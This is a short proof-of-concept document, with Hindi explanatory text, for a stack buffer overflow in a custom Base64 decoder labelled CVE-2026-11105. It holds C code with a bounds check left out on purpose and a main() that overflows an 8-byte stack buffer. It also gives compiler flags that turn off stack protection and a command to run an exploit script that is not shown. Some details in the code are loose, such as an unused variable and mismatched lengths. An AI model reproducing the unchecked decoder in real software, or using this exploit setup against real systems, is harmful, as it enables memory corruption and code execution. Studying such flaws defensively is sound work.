
CVE-2026-11105 PoC जो एक कस्टम Base64 डिकोडर में स्टैक बफर ओवरफ्लो को प्रदर्शित करता है; विशेष रूप से निर्मित अत्यधिक बड़ा इनपुट स्टैक मेमोरी को अधिलेखित कर देता है और मनमाना कोड निष्पादन को सक्षम बनाता है।
// base64_vuln.c - Vulnerable Base64 decoder
#include <stdio.h>
#include <string.h>
#include <stdint.h>
int base64_decode(const char *in, size_t inlen, char *out, size_t outlen) {
static const char table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int outpos = 0;
for (int i=0; i<inlen; i+=4) {
uint32_t sextet = 0;
int bytes = 0;
for (int j=0; j<4; j++) {
if (i+j >= inlen) break;
const char *p = strchr(table, in[i+j]);
if (p) sextet = (sextet << 6) | (p - table);
else bytes++;
}
// No check on outpos exceeding outlen!
out[outpos++] = (sextet >> 16) & 0xFF;
if (bytes < 2) out[outpos++] = (sextet >> 8) & 0xFF;
if (bytes < 1) out[outpos++] = sextet & 0xFF;
}
return outpos;
}
int main() {
char smallbuf[8];
char *malicious = "AAAA"; // padded, decodes to 3 bytes, but we'll feed a long string
// Attacker sends very long Base64 string, overflows smallbuf
base64_decode("QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB", 60, smallbuf, 8);
return 0;
}
एक कस्टम Base64 डिकोडिंग फ़ंक्शन आउटपुट बफर के आकार को मान्य नहीं करता है, जिससे एक क्लासिक स्टैक बफर ओवरफ्लो होता है। एक हमलावर रिटर्न एड्रेस को अधिलेखित करने और कोड निष्पादन प्राप्त करने के लिए एक अत्यधिक बड़ा इनपुट तैयार कर सकता है।
gcc -o base64_vuln base64_vuln.c -fno-stack-protector -z execstack
python exploit_base64_overflow.py